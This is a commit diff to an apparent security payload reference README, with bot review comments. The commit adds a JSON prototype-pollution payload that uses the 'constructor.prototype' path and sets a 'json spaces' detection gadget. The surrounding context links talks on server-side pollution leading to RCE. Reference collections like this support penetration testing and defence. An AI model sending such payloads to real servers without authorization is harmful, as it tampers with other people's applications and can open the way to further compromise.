adding the payload for Polluting the prototype via the constructor
…property in JSON input

Sometimes `__proto__` property may not work, so adding the payload for Polluting the prototype via the `constructor` property in JSON input
Aftab700 authored Jan 3, 2024
1 parent cbc6e78 commit 08063f0
Showing 1 changed file with 14 additions and 1 deletion.
15 changes: 14 additions & 1 deletion Prototype Pollution/README.md
Expand Up @@ -99,6 +99,19 @@ Asynchronous payload for NodeJS.
}
```

Polluting the prototype via the `constructor` property instead.

```js
{
"constructor": {
"prototype": {
"foo": "bar",
"json spaces": 10
}
}
}
```


### Prototype Pollution in URL
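
Review bot: the added sentence "Polluting the prototype via the `constructor` property instead." does not say when a reader should use this variant. The commit message gives the reason (`__proto__` may not work) but the README text does not, so carry that reason into the sentence. The fence is also tagged `js` although the body is a JSON document, so `json` would describe it better, and the two keys (`"foo": "bar"` and `"json spaces": 10`) would benefit from a short note on what each one is meant to demonstrate.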

Expand Down Expand Up @@ -176,4 +189,4 @@ Either create your own gadget using part of the source with [yeswehack/pp-finder
* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4)
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
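
Review bot: the last reference line (the Keynote link) is removed and re-added with identical visible text, which accounts for the commit's single deletion and looks like a whitespace or end-of-file newline change unrelated to the new payload. If that is intentional, mention it in the commit message; otherwise drop it so the diff contains only the README addition.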
